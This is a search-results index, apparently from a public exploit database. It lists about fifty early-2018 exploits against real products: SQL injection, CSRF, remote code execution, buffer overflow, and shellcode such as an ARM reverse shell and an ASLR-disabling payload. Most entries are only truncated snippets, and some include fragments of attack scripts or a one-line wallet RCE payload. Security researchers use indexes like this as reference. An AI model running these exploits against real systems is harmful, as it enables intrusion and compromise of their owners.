47904 matches found
systemd (systemd-tmpfiles) < 236 - 'fs.protected_hardlinks=0' Local Privilege Escalation
Product: systemd systemd-tmpfiles Versions-affected: 236 and earlier Author: Michael Orlitzky Fixed-in: commit 5579f85 , version 237 Bug-report: https://github.com/systemd/systemd/issues/7736 Acknowledgments: Lennart Poettering who, instead of calling me an idiot for not realizing that systemd...
Linux/x86 - Egghunter Shellcode (12 Bytes)
Linux/x86 - Egghunter Shellcode 12 Bytes. Shellcode exploit for Linuxx86 platform / Title: Linux/x86 - EggHunter Shellcode 12 Bytes Description: Smallest Null-Free Egg Hunter Shellcode - 12 Bytes Date : 14/Jan/2018 Author: Nipun Jaswal @nipunjaswal ; SLAE-1080 Details: 1. Works with an executable...
Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh)+ Null-Free Shellcode (80 bytes)
Linux/ARM - Reverse TCP 192.168.1.1:4444/TCP Shell /bin/sh+ Null-Free Shellcode 80 bytes. Shellcode exploit for ARM platform / Title: Linux/ARM - Reverse Shell TCP /bin/sh. Null free shellcode 80 bytes Date: 2018-01-25 Tested: armv7l Raspberry Pi v3 Author: rtmcx - twitter: @rtmcx / .section .tex...
Nexpose < 6.4.66 - Cross-Site Request Forgery
Exploit Title: Cross Site Request Forgery at Nexpose Automated Actions Release Date: 2017-12-13 Exploit Author: Shwetabh Vishnoi Link: https://www.linkedin.com/in/shwetabhvishnoi Vendor Homepage: https://www.rapid7.com/ Software Link: https://www.rapid7.com/products/nexpose/download/ Tested on:...
Joomla! Component JS Support Ticket 1.1.0 - Cross-Site Request Forgery
CODE input type="hidden" name="uid" id="uid"...
PACSOne Server 6.6.2 DICOM Web Viewer - Directory Trasversal
Exploit Title: PACSOne Server 6.6.2 DICOM Web Viewer Directory Trasversal / Local File Inclusion Date: 08/14/2017 Software Link: http://www.pacsone.net/download.htm Google Dork: inurl:pacs/login.php inurl:pacsone/login.php inurl:pacsone filetype:php home inurl:pacsone filetype:php login Version:...
Sony Playstation 3 (PS3) 4.82 - 'Jailbreak' (ROP)
EDB Note http://ps3xploit.com/help/dumper.html EDB Download https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44820.zip Dumper Help Warning: Due to the lack of proper checks after exiting the ROP chain, it is possible in some cases to obtain a success message despit...
PACSOne Server 6.6.2 DICOM Web Viewer - SQL Injection
Exploit Title: PACSOne Server 6.6.2 DICOM Web Viewer SQL Injection Date: 08/14/2017 Software Link: http://www.pacsone.net/download.htm Version: PACSOne Server 6.6.2 Exploit Author: Carlos Avila Google Dork: inurl:pacs/login.php inurl:pacsone/login.php inurl:pacsone filetype:php home inurl:pacsone...
Werkzeug - 'Debug Shell' Command Execution
!/usr/bin/env python import requests import sys import re import urllib usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 if lensys.argv != 5: print "USAGE: python %s " % sys.argv0 sys.exit-1 response = requests.get'http://%s:%s/console' % sys.argv1,sys.argv2 if "Werkzeug " not in...
KeystoneJS < 4.0.0-beta.7 - Cross-Site Request Forgery
Exploit Title: Application wide CSRF Bypass Date: Sep, 2017 Exploit Author: Saurabh Banawar Vendor Homepage: http://keystonejs.com/ Software Link: https://github.com/keystonejs/keystone Version: 4.0.0 Tested on: Windows 8.1 CVE : 2017-16570 Link: https://vuldb.com/?id.109170 Exploit:...
TSiteBuilder 1.0 - SQL Injection
Exploit Title: TSiteBuilder 1.0 - SQL Injection Dork: N/A Date: 27.01.2018 Vendor Homepage: http://www.datacomponents.net/ Software Link: http://www.datacomponents.net/products/website/ Version: 1.0 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CVE: N/A Exploit Author: Ihsan Sencan Author Web...
Gnew 2018.1 - Cross-Site Request Forgery
Exploit Title: Gnew 2018.1 - Cross-Site Request Forgery Date: 26/01/2018 Exploit Author: Cyril Vallicari / HTTPCS - ZIWIT Vendor website : http://gnew.xyz/ Software download : http://www.gnew.xyz/pages/download.php Version: 2018.1 Tested on: Windows 10 Home x64 / Kali Linux Product description :...
Hot Scripts Clone - 'subctid' SQL Injection
Exploit Title: Hot Scripts Clone Script 1.0 - SQL Injection Dork: N/A Date: 27.01.2018 Vendor Homepage: http://www.phpscriptsmall.com/ Software Link: http://www.exclusivescript.com/product/M72g4502563/php-scripts/hot-scripts-clone-:-script-classified Version: 1.0 Category: Webapps Tested on:...
Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download
Exploit Title: Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download Dork: N/A Date: 27.01.2018 Vendor Homepage: https://joomlatag.com/ Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/members-lists/jtag-members-directory/ Version: 5.3.7...
Task Rabbit Clone 1.0 - 'id' SQL Injection
Exploit Title: Task Rabbit Clone 1.0 - SQL Injection Dork: N/A Date: 27.01.2018 Vendor Homepage: http://migrateshop.com/ Software Link: http://migrateshop.com/product/task-rabbit-clone-php-script/ Version: 1.0 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CVE: N/A Exploit Author: Ihsan Sencan...
Artifex MuJS 1.0.2 - Integer Overflow
Exploit Title: DoS caused by the interactive call between two functions Date: 2018-01-16 Exploit Author: Andrea Sindoni - @invictus1306 Vendor: Artifex https://www.artifex.com/ Software Link: https://github.com/ccxvii/mujs Version: Mujs - 228719d087aa5e27dcd8627c4acf7273476bdbca Tested on: Linux...
Artifex MuJS 1.0.2 - Denial of Service
Hello, I want to submit the following bug: The jsstrtod function in jsdtoa.c in Artifex MuJS through 1.0.2 has an integer overflow because of incorrect exponent validation. Exploit Title: Integer signedness error leading to Out-of-bounds read that causes crash Date: 2018-01-24 Exploit Author:...
Trend Micro Threat Discovery Appliance 2.6.1062r1 - 'dlp_policy_upload.cgi' Remote Code Execution
!/usr/local/bin/python """ Trend Micro Threat Discovery Appliance /opt/TrendMicro/MinorityReport/bin/ Then, all we do is create /engptnstores/prod/sensorSDK/data/si/dlpkill.sh with malicious code and get it executed... Notes: ====== - For this particular PoC, all I did was exec a bind shell using...
Netis WF2419 Router - Cross-Site Request Forgery
Exploit Title: Netis-WF2419 Router Cross-Site Request Forgery CSRF Date: 28/01/2018 Exploit Author: Sajibe Kanti Author Contact: https://twitter.com/@sajibekantibd Vendor Homepage: http://www.netis-systems.com/ Version: Netis-WF2419, V2.2.36123 Tested on: Windows 10 Technical Details & Descriptio...
Buddy Zone 2.9.9 - SQL Injection
Exploit Title: Vastal I-Tech Facebook Clone 2.9.9 - SQL Injection Dork: N/A Date: 27.01.2018 Vendor Homepage: http://vastal.com/ Software Link: http://vastal.com/buddy-zone-social-networking-script.html Version: 2.9.9 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CVE: N/A Exploit Author: Ihsa...
Multilanguage Real Estate MLM Script 3.0 - 'srch' SQL Injection
Exploit Title: Multilanguage Real Estate MLM Script = 3.0 - SQL Injection Dork: N/A Date: 27.01.2018 Vendor Homepage: http://www.phpscriptsmall.com/ Software Link: http://www.exclusivescript.com/product/y2OP4658391/php-scripts/multilanguage-real-estate-mlm-script Version: = 3.0 Category: Webapps...
Linux/x86 - Disable ASLR Security + Obfuscated Shellcode (23 bytes)
Linux/x86 - Disable ASLR Security + Obfuscated Shellcode 23 bytes. Shellcode exploit for Linuxx86 platform ;Title : Linux/x86 - Disable ASLR Security obfuscated shellcode - 23 bytes ;Date : 24 Jan 2018 ;Author : 0xAlaufi ;Tested on : Linux/x86 Ubuntu 12.04.5 global start section .text start: jmp...
WordPress Plugin Learning Management System - 'course_id' SQL Injection
Exploit Title: Good LMS - Learning Management System WP Plugin SQL Injection Date: 2018-01-24 Exploit Author: Esecurity.ir Exploit Author Web Site: http://esecurity.ir Special Thanks : Meisam Monsef [email protected] - Telegram ID : @meisamrce Vendor Homepage: https://goodlayers.com/ Version: A...
Dodocool DC38 N300 - Cross-site Request Forgery
Exploit Title: DODOCOOL DC38 N300 Cross-site Request Forgery Date: 17-01-2018 Exploit Authors: Raffaele Sabato Contact: https://twitter.com/syrion89 Vendor: DODOCOOL Vendor Homepage: www.dodocool.com Version: RTN2-AW.GD.R3465.1.20161103 CVE: CVE-2018-5720 I DESCRIPTION...
BMC BladeLogic 8.3.00.64 - Remote Command Execution
Exploit Title: BMC BladeLogic RSCD agent remote exec - XMLRPC version Filename: BMCrexec.py Github: https://github.com/bao7uo/bmcbladelogic Date: 2018-01-24 Exploit Author: Paul Taylor / Foregenix Ltd Website: http://www.foregenix.com/blog Version: BMC RSCD agent 8.3.00.64 CVE: CVE-2016-1542...
Exodus Wallet (ElectronJS Framework) - Remote Code Execution
window.location = 'exodus://aaaaaaaaa" --gpu-launcher="cmd" --aaaaa='...
ASUS DSL-N14U B1 Router 1.1.2.3_345 - Change Administrator Password
import requests import sys import urllib3 ip = sys.argv1 user = sys.argv2 newPassword = sys.argv3 requests.packages.urilib3.disablewarnings urllib3.disablewarningsurllib3.exceptions.InsecureRequestWarning data = "groupid": '', "actionmode": "apply", "currentpage": "MainPassword.asp", "nextpage":...
Professional Local Directory Script 1.0 - SQL Injection
Exploit Title: Professional Local Directory Script 1.0 - SQL Injection Dork: N/A Date: 23.01.2018 Vendor Homepage: http://www.eihitech.com/ Software Link: http://www.eihitech.com/ Version: 1.0 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CVE: CVE-2018-5973 Exploit Author: Ihsan Sencan Author...
Oracle VirtualBox < 5.1.30 / < 5.2-rc1 - Guest to Host Escape
SSD Advisory – Oracle VirtualBox Multiple Guest to Host Escape Vulnerabilities Source: https://blogs.securiteam.com/index.php/archives/3649 Vulnerabilities summary The following advisory describes two 2 guest to host escape found in Oracle VirtualBox version 5.1.30, and VirtualBox version 5.2-rc1...
Kaltura - Remote PHP Code Execution over Cookie (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Kaltura Remote PHP Code Execution over Cookie', 'Description' = %q This module exploits an Object Injection vulnerability in Kaltura. By exploiti...
Telerik UI for ASP.NET AJAX 2012.3.1308 < 2017.1.118 - Arbitrary File Upload
Exploit Title: Telerik UI for ASP.NET AJAX RadAsyncUpload uploader Filename: RAUcrypto.py Github: https://github.com/bao7uo/RAUcrypto Date: 2018-01-23 Exploit Author: Paul Taylor / Foregenix Ltd Website: http://www.foregenix.com/blog Version: Telerik UI for ASP.NET AJAX CVE: CVE-2017-11317,...
Sync Breeze Enterprise 9.5.16 - 'Import Command' Buffer Overflow (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow', 'Description' = %q This module exploits a buffer overflow in Sync Breeze...
RAVPower 2.000.056 - Root Remote Code Execution
""" Exploit Title: RAVPower - remote root Date: 23/01/2018 Exploit Authors: Daniele Linguaglossa Vendor Homepage: https://www.ravpower.com/ Software Link: https://www.ravpower.com/ Version: 2.000.056 Tested on: OSX CVE : CVE-2018-5997 """ import requests import time import telnetlib PATHPASSWD =...
WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure
Exploit Title: WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure Google Dork: Date: 2018-01-23 Exploit Author: ThreatPress Security Vendor Homepage: http://icegram.com/ Software Link: https://wordpress.org/plugins/email-subscribers/ Version: 3.4.7 Tested on: WordPres...
GoAhead Web Server 2.5 < 3.6.5 - HTTPd 'LD_PRELOAD' Arbitrary Module Load (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'GoAhead Web Server LDPRELOAD Arbitrary Module Load', 'Description' = %q This module triggers an arbitrary shared library load vulnerability in...
Telerik UI for ASP.NET AJAX 2012.3.1308 < 2017.1.118 - Encryption Keys Disclosure
Exploit Title: Telerik UI for ASP.NET AJAX DialogHandler Dialog cracker Filename: dpcrypto.py Github: https://github.com/bao7uo/dpcrypto Date: 2018-01-23 Exploit Author: Paul Taylor / Foregenix Ltd Website: http://www.foregenix.com/blog Version: Telerik UI for ASP.NET AJAX CVE: CVE-2017-9248 Vend...
Linux/x86 - execve(/bin/sh) + ROT-N + Shift-N + XOR-N Encoded Shellcode (77 bytes)
Linux/x86 - execve/bin/sh + ROT-N + Shift-N + XOR-N Encoded Shellcode 77 bytes. Shellcode exploit for Linuxx86 platform / Description ; Title : ROT-N + Shift-N + XOR-N encoded /bin/sh - Shellcode ; Author : Hashim Jawad ; Blog Post :...
Zechat 1.5 - SQL Injection
Exploit Title: Facebook Style Php Ajax Chat - Zechat 1.5 - SQL Injection Dork: N/A Date: 23.01.2018 Vendor Homepage: http://bylancer.com/ Software Link: https://codecanyon.net/item/facebook-style-php-ajax-chat-zechat/16491266 Version: 1.5 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CVE:...
Easy Car Script 2014 - SQL Injection
Exploit Title: Easy Car Script 2014 - SQL Injection Dork: N/A Date: 23.01.2018 Vendor Homepage: http://www.easyphotostore.com/ Software Link: http://www.easycarscript.com/ Version: 2014 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CVE: CVE-2018-5986 Exploit Author: Ihsan Sencan Author Web:...
NEC Univerge SV9100/SV8100 WebPro 10.0 - Configuration Download
NEC Univerge SV9100/SV8100 WebPro 10.0 Remote Configuration Download Vendor: NEC Corporation Product web page: http://www.nec.com Affected version: WebPro =10.00 DSP Firmware Version: 12.11.00.02 Summary: NEC's UNIVERGE® SV9100 is the unified communications UC solution of choice for small and...
MixPad 5.00 - Buffer Overflow
!/usr/bin/python Exploit Author: bzyo Twitter: @bzyo Exploit Title: NCH Software MixPad v5.00 - Unicode Buffer Overflow Date: 21-01-2017 Vulnerable Software: NCH Software MixPad Vendor Homepage: http://www.nch.com.au/mixpad Version: v5.00 Software Link: http://www.nch.com.au/mixpad/mpsetup.exe...
HP Connected Backup 8.6/8.8.6 - Local Privilege Escalation
Tested on HP Connected Backup version 8.8.2.0 on Windows 7 x64 import os import sys import time import requests from bs4 import BeautifulSoup def sendrequestbody: url="http://localhost:16386/" headers = "Content-Type": "text/xml; charset=utf-8", 'SOAPAction': '""', "Set-Cookie":...
CentOS Web Panel 0.9.8.12 - 'row_id' / 'domain' SQL Injection
Document Title: =============== CentOS Web Panel v0.9.8.12 - Remote SQL Injection Vulnerabilities References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1833 Release Date: ============= 2018-01-22 Vulnerability Laboratory ID VL-ID:...
RAVPower 2.000.056 - Memory Disclosure
""" Exploit Title: RAVPower - remote stack disclosure Date: 22/01/2018 Exploit Author: Daniele Linguaglossa Vendor Homepage: https://www.ravpower.com/ Software Link: https://www.ravpower.com/ Version: 2.000.056 Tested on: OSX CVE : CVE-2018-5319 """ import socket import sys import re author =...
Photography CMS 1.0 - Cross-Site Request Forgery (Add Admin)
New Admin Username: Password: Confirm Password: Email: $"ekleabi".live'click',function $.ajax type: "POST", url: "http://ronnieswietek.com/cc/clients/resources/ajax/ajaxnewadmin.php", data: username:$".efe username".val, password1:$".efe password1".val, password2:$".efe password2".val, email:$".e...
Tumder 2.1 - SQL Injection
Exploit Title: Tumder - An Arcade Games Platform 2.1 - SQL Injection Dork: N/A Date: 23.01.2018 Vendor Homepage: http://sndr.co.ve/ Software Link: https://codecanyon.net/item/tumder-an-arcade-games-platform/18726994 Version: 2.1 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CVE: CVE-2018-5984...
Flexible Poll 1.2 - SQL Injection
Exploit Title: Flexible Poll 1.2 - SQL Injection Dork: N/A Date: 23.01.2018 Vendor Homepage: http://ddywpro.com/ Software Link: https://codecanyon.net/item/flexible-poll/4363114 Version: 1.2 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CVE: CVE-2018-5988 Exploit Author: Ihsan Sencan Author...
Quickad 4.0 - SQL Injection
Exploit Title: Classified Ads CMS - Quickad 4.0 - SQL Injection Dork: N/A Date: 23.01.2018 Vendor Homepage: http://bylancer.com/ Software Link: https://codecanyon.net/item/quickad-classified-ads-php-script/19960675 Version: 4.0 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CVE: CVE-2018-5972...
Wchat 1.5 - SQL Injection
Exploit Title: Wchat - Fully Responsive PHP AJAX Chat Script 1.5 - SQL Injection Dork: N/A Date: 23.01.2018 Vendor Homepage: http://bylancer.com/ Software Link: https://codecanyon.net/item/wchat-fully-responsive-phpajax-chat/18047319 Version: 1.5 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64...
LiveCRM SaaS Cloud 1.0 - SQL Injection
Exploit Title: LiveCRM SaaS Cloud 1.0 - SQL Injection Dork: N/A Date: 23.01.2018 Vendor Homepage: http://livecrm.co/ Software Link: https://codecanyon.net/item/livecrm-saas-cloud-cloud-based-open-source-complete-business-management-solution-crm/21219419 Version: 1.0 Category: Webapps Tested on:...